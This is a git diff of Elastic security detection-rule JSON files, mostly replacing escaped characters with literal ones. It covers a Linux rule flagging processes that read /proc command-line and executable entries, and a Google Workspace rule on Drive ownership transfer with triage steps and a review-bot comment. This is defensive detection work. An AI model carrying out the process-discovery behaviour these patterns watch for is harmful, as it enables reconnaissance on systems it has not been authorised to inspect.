read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and \nfile.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.name : (\n ps or netstat or landscape-sysin or w or pgrep or pidof or needrestart or apparmor_status\n) and not process.parent.pid : 1\n", "required_fields": [ { 
@@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json index 6ca25084653..3ae21a83094 100644 --- a/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/0787daa6-f8c5-453b-a4ec-048037f6c1cd_5.json 
@@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "0787daa6-f8c5-453b-a4ec-048037f6c1cd", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json index 5577129567d..1b984207c4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_3.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json
index 0100ce78789..19d31158d34 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_4.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -75,7 +75,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json
index 13d709b977f..7c3c65fef19 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_5.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -76,7 +76,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json
index 6075eb39d0d..d857fbbd311 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_6.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -81,7 +81,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json
index 80a0f837191..56abe2e6941 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json
index ccc884dc385..9bf7c5b5d4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_105.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Drive Ownership Transferred via Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security \u003e Reporting \u003e Audit and investigation \u003e Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory \u003e Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps \u003e Google Workspace \u003e Drive and Docs \u003e Manage shared drives`.\n- Triage potentially related alerts based on the users involved. 
To find alerts, go to `Security \u003e Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. 
Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security > Reporting > Audit and investigation > Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory > Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps > Google Workspace > Drive and Docs > Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security > Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. 
Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CREATE_DATA_TRANSFER_REQUEST\"\n and event.category:\"iam\" and google_workspace.admin.application.name:Drive*\n", "references": [ "https://support.google.com/a/answer/1247799?hl=en" @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
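Review bot: The investigation step `If a shared drive, access requirements based on Organizational Units in Apps > Google Workspace > Drive and Docs > Manage shared drives` on the new `note` line is missing its verb, so an analyst is not told what to do at that console page; `If a shared drive, review the access requirements based on Organizational Units in Apps > Google Workspace > Drive and Docs > Manage shared drives` reads like the surrounding steps. The lag-time section on the same line states the rule runs every 10 minutes with a 130-minute lookback while acknowledging delays of up to 3 days; the rule's schedule fields are not in this hunk, so I cannot confirm those numbers match the rule body, but they should be re-checked whenever the schedule changes. The `_106` revision in the hunk beginning at L138 carries the same sentence; as these version-suffixed files appear to be shipped snapshots, the wording fix presumably belongs in the rule source they are generated from.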
diff --git a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json
index 434d01055d2..e78ca808daa 100644
--- a/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/07b5f85a-240f-11ed-b3d9-f661ea17fbce_106.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Drive Ownership Transferred via Google Workspace", - "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security \u003e Reporting \u003e Audit and investigation \u003e Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory \u003e Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps \u003e Google Workspace \u003e Drive and Docs \u003e Manage shared drives`.\n- Triage potentially related alerts based on the users involved. 
To find alerts, go to `Security \u003e Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Drive Ownership Transferred via Google Workspace\n\nGoogle Drive is a cloud storage service that allows users to store and access files. It is available to users with a Google Workspace account.\n\nGoogle Workspace administrators consider users' roles and organizational units when assigning permissions to files or shared drives. 
Owners of sensitive files and folders can grant permissions to users who make internal or external access requests. Adversaries abuse this trust system by accessing Google Drive resources with improperly scoped permissions and shared settings. Distributing phishing emails is another common approach to sharing malicious Google Drive documents. With this approach, adversaries aim to inherit the recipient's Google Workspace privileges when an external entity grants ownership.\n\nThis rule identifies when the ownership of a shared drive within a Google Workspace organization is transferred to another internal user.\n\n#### Possible investigation steps\n\n- From the admin console, review admin logs for involved user accounts. To find admin logs, go to `Security > Reporting > Audit and investigation > Admin log events`.\n- Determine if involved user accounts are active. To view user activity, go to `Directory > Users`.\n- Check if the involved user accounts were recently disabled, then re-enabled.\n- Review involved user accounts for potentially misconfigured permissions or roles.\n- Review the involved shared drive or files and related policies to determine if this action was expected and appropriate.\n- If a shared drive, access requirements based on Organizational Units in `Apps > Google Workspace > Drive and Docs > Manage shared drives`.\n- Triage potentially related alerts based on the users involved. To find alerts, go to `Security > Alerts`.\n\n### False positive analysis\n\n- Transferring drives requires Google Workspace administration permissions related to Google Drive. 
Check if this action was planned/expected from the requester and is appropriately targeting the correct receiver.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CREATE_DATA_TRANSFER_REQUEST\"\n and event.category:\"iam\" and google_workspace.admin.application.name:Drive*\n", "references": [ "https://support.google.com/a/answer/1247799?hl=en" @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json index c58ce02c4f2..8ecbe52ddd1 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json index eff45c41b7e..4c57302e844 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json index 7b438d8272a..321c59c7b34 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json index fb965a4e8d0..76785ab8437 100644 --- a/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/080bc66a-5d56-4d1f-8071-817671716db9_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json index f6b6d164f26..023e66cc76c 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json index 93315c75005..bf373161a47 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_103.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json index af5a303753f..6e639b89fdc 100644 --- a/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json +++ b/packages/security_detection_engine/kibana/security_rule/082e3f8c-6f80-485c-91eb-5b112cb79b28_104.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": 